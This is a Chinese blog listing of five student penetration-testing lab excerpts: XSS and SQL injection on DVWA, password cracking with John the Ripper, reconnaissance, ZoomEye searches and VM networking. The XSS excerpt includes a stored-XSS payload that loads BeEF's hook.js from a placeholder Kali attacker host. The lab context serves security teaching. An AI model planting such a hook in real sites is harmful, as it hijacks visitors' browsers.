- 博客(5)
- 收藏
- 关注
RSS订阅原创 网络渗透测试实验三(XSS和SQL注入)
这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存型XSS的危害会更大。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。http://IP地址/DVWA-master/vulnerabilities/sqli/?<script src="http://Kali的IP地址:3000/hook.js"></script>,截图。攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
2023-12-25 16:26:07
987
原创 网络渗透测试实验二(网络嗅探与身份认证)
John the Ripper是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如DES、MD4、MD5等。进行字典攻击就需要字典,而字典中含有各种密码、用户名,一一匹配进行登录尝试,所以字典就需要很庞大进行尝试,所以合适的字典就会增大破解的可能性,也会减少破解效率和时间,故而字典也是字典攻击里面最重要的一环。另外还学习了字典攻击,对某一个网站进行暴力破解,在实验中了解到了字典选择的重要性,一个好的字典可以让爆破更加顺利,提高效率。
2023-12-23 22:14:09
1040
原创 网络渗透测试实验一(网络扫描与网络侦查)
被该勒索软件入侵后,用户主机系统内的照片、图片、文档、音频、视频等几乎所有类型的文件都将被加密,加密文件的后缀名被统一修改为.WNCRY,并会在桌面弹出勒索对话框,要求受害者支付价值数百美元的比特币到攻击者的比特币钱包,且赎金金额还会随着时间的推移而增加。WannaCry勒索病毒全球大爆发,至少150个国家、30万名用户中招,造成损失达80亿美元,已经影响到金融,能源,医疗等众多行业,造成严重的危机管理问题。两者值不相同,在网站中的到的是公网的IP,而使用ipconfig得到的则是内网的IP。
2023-12-23 21:48:39
863
原创 网络渗透测试作业3
与ZoomEye功能类似的搜索引擎还有Google,360 网络空间资产测绘,Shodan 网络空间设备搜索引擎,Censys 联网设备信息搜索引擎,DNSdb搜索引擎,全球鹰等等。1.与ZoomEye功能类似的搜索引擎还有哪些?1.与ZoomEye功能类似的搜索引擎还有哪些?1.与ZoomEye功能类似的搜索引擎还有哪些?2.利用ZoomEye进行相关搜索,截图。2.利用ZoomEye进行相关搜索,截图。3.子域名收集,截图。3.子域名收集,截图。在线爆破目标网站子域名。
2023-11-19 21:22:24
123
1
原创 网络渗透测试2
IPv6提供了更大的地址空间,更好的支持IP安全,同时也提供了更好的IP多播支持和更快的路由转发速度。使用桥接模式连接网络的虚拟机可以获得与宿主机相同的网络地址,这样可以方便地与其他设备进行通信,而且不需要额外的 IP 地址。对于需要在虚拟机中进行网络测试或开发的用户来说,使用桥接模式连接网络是非常方便的。当虚拟机使用桥接模式连接网络时,它会使用主机的网络适配器,就像连接在主机上的任何其他设备一样。这样,虚拟机就可以直接访问网络,并且可以使用主机网络中的其他设备。3、对于1、2的结果,进行总结分析。
2023-11-12 22:00:15
100
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人